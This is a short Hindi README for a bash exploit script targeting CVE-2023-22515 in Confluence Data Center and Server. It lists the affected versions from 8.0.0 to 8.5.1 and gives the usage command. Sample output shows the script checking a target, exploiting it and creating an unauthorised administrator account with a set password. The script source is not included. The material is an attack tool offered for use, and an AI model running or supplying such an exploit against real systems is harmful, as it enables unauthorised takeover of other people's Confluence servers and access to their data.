
# बैश स्क्रिप्ट जो Confluence Data Center और Server में CVE-2023-22515 का शोषण करके अनधिकृत व्यवस्थापक खाते बनाती है, जिससे अनधिकृत पहुंच संभव होती है।
CVE-2023-22515 के लिए एक सरल बैश स्क्रिप्ट शोषण।
Confluence Data Center और Server इंस्टेंस में एक Broken Access Control भेद्यता (CVE-2023-22515) है, जो हमलावरों को अनधिकृत Confluence व्यवस्थापक खाते बनाने और Confluence इंस्टेंस तक पहुँचने की अनुमति देती है।
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] Checking if host is vulnerable...
Vulnerable --> Responde Code: 200
[+] Exploiting Target...
[+] Exploit Completed!!!
[INFO] User created: a123456
[INFO] Password created: ChangeMe123